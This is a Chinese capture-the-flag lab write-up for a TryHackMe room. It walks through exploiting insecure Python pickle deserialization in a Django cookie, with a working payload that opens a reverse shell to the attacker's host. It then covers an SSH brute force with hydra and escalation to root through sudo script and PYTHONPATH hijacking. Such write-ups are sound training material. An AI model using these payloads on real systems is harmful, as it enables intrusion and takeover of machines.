打靶记录(一零六)之THMUnbakedPie

端口扫描

map --min-rate=10000 -p- 10.10.118.24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-16 06:10 UTC
Nmap scan report for ip-10-10-118-24.eu-west-1.compute.internal (10.10.118.24)
Host is up (0.0020s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
5003/tcp open  filemaker
MAC Address: 02:15:B6:1C:A2:91 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds

nmap -sC -sT -sV -O -p5003 10.10.118.24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-16 06:11 UTC
Nmap scan report for ip-10-10-118-24.eu-west-1.compute.internal (10.10.118.24)
Host is up (0.00040s latency).

PORT     STATE SERVICE    VERSION
5003/tcp open  filemaker?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 16 Mar 2024 06:11:16 GMT
|     Server: WSGIServer/0.2 CPython/3.8.6
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Vary: Cookie
|     Content-Length: 7453
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Set-Cookie: csrftoken=D4PpADZYUbPUATOPQHZS9mmUk75Cs4jbfbaRLbAgjvIfOfqeVWp0H68YLxKGVnQy; expires=Sat, 15 Mar 2025 06:11:16 GMT; Max-Age=31449600; Path=/; SameSite=Lax
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <meta name="description" content="">
|     <meta name="author" content="">
|     <title>[Un]baked | /</title>
|     <!-- Bootstrap core CSS -->
|     <link href="/static/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
|     <!-- Custom fonts for this template -->
|     <link href="/static/vendor/fontawesome-free/css/all.min.cs
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 16 Mar 2024 06:11:17 GMT
|     Server: WSGIServer/0.2 CPython/3.8.6
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Vary: Cookie
|     Content-Length: 7453
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Set-Cookie: csrftoken=3pRdS6yIHTkir6MpsNt1dFnyinKIK9sYMjRKL9MnhMTcwmEQZlPKUeg55ZZvKBBa; expires=Sat, 15 Mar 2025 06:11:17 GMT; Max-Age=31449600; Path=/; SameSite=Lax
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <meta name="description" content="">
|     <meta name="author" content="">
|     <title>[Un]baked | /</title>
|     <!-- Bootstrap core CSS -->
|     <link href="/static/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
|     <!-- Custom fonts for this template -->
|_    <link href="/static/vendor/fontawesome-free/css/all.min.cs
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5003-TCP:V=7.93%I=7%D=3/16%Time=65F53805%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1C59,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2016\x20Mar\x20
SF:2024\x2006:11:16\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.
SF:6\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x
SF:20DENY\r\nVary:\x20Cookie\r\nContent-Length:\x207453\r\nX-Content-Type-
SF:Options:\x20nosniff\r\nReferrer-Policy:\x20same-origin\r\nSet-Cookie:\x
SF:20\x20csrftoken=D4PpADZYUbPUATOPQHZS9mmUk75Cs4jbfbaRLbAgjvIfOfqeVWp0H68
SF:YLxKGVnQy;\x20expires=Sat,\x2015\x20Mar\x202025\x2006:11:16\x20GMT;\x20
SF:Max-Age=31449600;\x20Path=/;\x20SameSite=Lax\r\n\r\n\n<!DOCTYPE\x20html
SF:>\n<html\x20lang=\"en\">\n\n<head>\n\n\x20\x20<meta\x20charset=\"utf-8\
SF:">\n\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,
SF:\x20initial-scale=1,\x20shrink-to-fit=no\">\n\x20\x20<meta\x20name=\"de
SF:scription\"\x20content=\"\">\n\x20\x20<meta\x20name=\"author\"\x20conte
SF:nt=\"\">\n\n\x20\x20<title>\[Un\]baked\x20\|\x20/</title>\n\n\x20\x20<!
SF:--\x20Bootstrap\x20core\x20CSS\x20-->\n\x20\x20<link\x20href=\"/static/
SF:vendor/bootstrap/css/bootstrap\.min\.css\"\x20rel=\"stylesheet\">\n\n\x
SF:20\x20<!--\x20Custom\x20fonts\x20for\x20this\x20template\x20-->\n\x20\x
SF:20<link\x20href=\"/static/vendor/fontawesome-free/css/all\.min\.cs")%r(
SF:HTTPOptions,1EC5,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2016\x20Mar\
SF:x202024\x2006:11:17\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.
SF:8\.6\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options
SF::\x20DENY\r\nVary:\x20Cookie\r\nContent-Length:\x207453\r\nX-Content-Ty
SF:pe-Options:\x20nosniff\r\nReferrer-Policy:\x20same-origin\r\nSet-Cookie
SF::\x20\x20csrftoken=3pRdS6yIHTkir6MpsNt1dFnyinKIK9sYMjRKL9MnhMTcwmEQZlPK
SF:Ueg55ZZvKBBa;\x20expires=Sat,\x2015\x20Mar\x202025\x2006:11:17\x20GMT;\
SF:x20Max-Age=31449600;\x20Path=/;\x20SameSite=Lax\r\n\r\n\n<!DOCTYPE\x20h
SF:tml>\n<html\x20lang=\"en\">\n\n<head>\n\n\x20\x20<meta\x20charset=\"utf
SF:-8\">\n\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-wid
SF:th,\x20initial-scale=1,\x20shrink-to-fit=no\">\n\x20\x20<meta\x20name=\
SF:"description\"\x20content=\"\">\n\x20\x20<meta\x20name=\"author\"\x20co
SF:ntent=\"\">\n\n\x20\x20<title>\[Un\]baked\x20\|\x20/</title>\n\n\x20\x2
SF:0<!--\x20Bootstrap\x20core\x20CSS\x20-->\n\x20\x20<link\x20href=\"/stat
SF:ic/vendor/bootstrap/css/bootstrap\.min\.css\"\x20rel=\"stylesheet\">\n\
SF:n\x20\x20<!--\x20Custom\x20fonts\x20for\x20this\x20template\x20-->\n\x2
SF:0\x20<link\x20href=\"/static/vendor/fontawesome-free/css/all\.min\.cs");
MAC Address: 02:15:B6:1C:A2:91 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.77 seconds

Getshell

只开启了一个5003，经过探测是一个django框架。根据房间提示是反序列化，抓包查看搜索与登录注册界面，发现在搜索的时候会设置一个search_cookie

POST /search HTTP/1.1
Host: 10.10.118.24:5003
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.118.24:5003/search
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://10.10.118.24:5003
Connection: close
Cookie: csrftoken=ddxfbdti3hwvCVPSll5CWHYUN86XyjRm7xBnaNzgcOQUX9yWqnSu4k4uwsmMGjFH; search_cookie="gASVCAAAAAAAAACMBDExMTGULg=="
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=eAM93708tMC0u2q3DxT7AFimtDrb2wyP8UQh2H66CjWpPg97IzGZIioWcXH0awma&query=11

在response中能得到一个Set-Cookie: search_cookie=”gASVBgAAAAAAAACMAjExlC4=”

将其base64解码之后再进行反序列化:

import base64
import pickle

cookie= "gASVBgAAAAAAAACMAjExlC4="

raw_data = base64.b64decode(cookie)

result = pickle.loads(raw_data)

print(result)

python test.py
11

那就是会将我们的输入进行序列化成cookie?如果要利用的话，那我们要传入一个cookie，服务器就会进行base64解码然后反序列化。

import pickle, os,base64

class SerializedPickle(object):
    def __reduce__(self):
        return(os.system,("ping -c 1 10.11.77.28",))

payload=base64.b64encode(pickle.dumps(SerializedPickle()))
print(payload)

开启tcpdump，抓包/search之后，更改cookie值发包,收到了ping

POST /search HTTP/1.1
Host: 10.10.118.24:5003
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.118.24:5003/search
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://10.10.118.24:5003
Connection: close
Cookie: csrftoken=ddxfbdti3hwvCVPSll5CWHYUN86XyjRm7xBnaNzgcOQUX9yWqnSu4k4uwsmMGjFH; search_cookie="gASVMAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBVwaW5nIC1jIDEgMTAuMTEuNzcuMjiUhZRSlC4="
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=RD1FaRUPpiWWaIBcr77Lv5YVnU0dORoqLX5N9r0NyPglvWkgw9UDDI4v6eg2WRcL&query=1111

改为一个反弹shell

import pickle, os,base64

class SerializedPickle(object):
    def __reduce__(self):
        return(os.system,("bash -c '0<&134-;exec 134<>/dev/tcp/10.11.77.28/443;sh <&134 >&134 2>&134'",))

payload=base64.b64encode(pickle.dumps(SerializedPickle())).decode()
print(payload)

开启监听，收到了一个root身份的反弹shell，但是应该在docker中

Docker逃逸

ip:172.17.0.2/16

在root家目录发现历史记录没有删，ssh ramsey@172.17.0.1

用chisel做一个端口转发

kali中:

./chisel server -p 8000 --reverse

靶机上:

./chisel client 10.11.77.28:8000 R:22:172.17.0.1:22

在app目录有一个db.sqlite3,转下到kali查看,在auth_user表中能发现ramsey这个用户的密码哈希

pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO/DlQy+w6mRHf4scq8FMnc1pWufS+Ik=

https://hashcat.net/wiki/doku.php?id=example_hashes

发现是ID为10000的哈希，用hashcat，但是半天破解不出来

尝试直接破解ssh

hydra -l ramsey -P /usr/share/wordlists/rockyou.txt ssh://localhost -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-16 08:14:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://localhost:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://ramsey@127.0.0.1:22
[INFO] Successful, password authentication is supported by ssh://127.0.0.1:22
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Disabled child 15 because of too many errors
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Disabled child 14 because of too many errors
[22][ssh] host: localhost   login: ramsey   password: 12345678
[STATUS] attack finished for localhost (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-16 08:14:45

好一个弱密码

ramsey@unbaked:~$ sudo -l
[sudo] password for ramsey: 
Matching Defaults entries for ramsey on unbaked:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ramsey may run the following commands on unbaked:
    (oliver) /usr/bin/python /home/ramsey/vuln.py

提权

当然，这个目录我们是可写的，于是写一个同名的os.system(‘/bin/bash’)

执行之后我们是oliver

oliver@unbaked:/home/oliver$ sudo -l
Matching Defaults entries for oliver on unbaked:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User oliver may run the following commands on unbaked:
    (root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py

看到这个SETENV一眼库劫持

创建一个docker.py，写上os.system(‘/bin/bash’)

sudo -u root PYTHONPATH=/tmp/ /usr/bin/python /opt/dockerScript.py

现在我们事root!

碎碎念

虽然都是比较熟悉的知识点，但还是卡了挺久的，不过这房间质量还是不错的